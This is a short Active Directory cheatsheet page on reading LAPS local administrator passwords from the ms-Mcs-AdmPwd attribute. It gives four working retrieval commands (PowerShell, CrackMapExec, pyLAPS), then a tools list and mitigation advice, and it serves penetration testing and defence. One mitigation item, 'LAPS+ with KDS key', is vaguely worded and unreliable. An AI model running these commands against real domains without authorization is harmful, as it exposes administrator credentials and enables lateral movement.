Back to Active Directory

Ad Local Admin Password

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

Local Administrator Password Solution (LAPS) stores local admin passwords in Active Directory as ms-Mcs-AdmPwd attributes on computer objects. Any authenticated user with read access to this attribute can retrieve the local administrator password for any computer.

Default LAPS permissions often grant read access to all authenticated users, making it a common escalation vector.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Ad Local Admin Password:

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | select Name,ms-Mcs-AdmPwd
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime | where {$_.ms-Mcs-AdmPwd -ne $null}
crackmapexec ldap 10.10.10.10 -u user -p password -M laps
pyLAPS.py --action get -u user@domain.local -p 'password' -d domain.local -l dc.domain.local

Tools & Techniques

Recommended tools for Ad Local Admin Password:

  • PowerShell: Get-ADComputer with ms-Mcs-AdmPwd attribute
  • CrackMapExec: laps module for LAPS retrieval
  • pyLAPS: Python LAPS password reader
  • Requires: read access to ms-Mcs-AdmPwd on computer objects

Prevention & Mitigation

Security recommendations to prevent Ad Local Admin Password:

  • Restrict read access to ms-Mcs-AdmPwd attribute
  • Delegate LAPS read to only authorized administrators
  • Audit who can read LAPS passwords
  • Use extended protection for LAPS (LAPS+ with KDS key)

References

Additional resources: